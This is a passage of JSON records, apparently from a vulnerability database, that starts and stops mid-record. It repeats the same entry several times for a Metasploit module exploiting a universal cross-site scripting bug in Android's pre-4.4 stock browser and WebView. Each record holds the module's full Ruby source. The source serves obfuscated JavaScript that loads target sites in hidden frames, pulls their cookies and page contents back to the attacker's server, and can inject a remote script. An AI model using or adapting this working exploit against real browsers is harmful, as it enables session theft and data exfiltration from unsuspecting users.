["modified", "published"], "edition": 45}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-03T21:02:33", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-03T21:02:33", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-03T23:02:35", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-03T23:02:35", "differentElements": ["modified", "published"], "edition": 47}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-06T00:59:04", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-06T00:59:04", "differentElements": ["modified", "published"], "edition": 48}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-06T02:57:51", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-06T02:57:51", "differentElements": ["modified", "published"], "edition": 49}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-11T21:21:31", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-11T21:21:31", "differentElements": ["modified", "published"], "edition": 50}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-11T23:22:50", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = 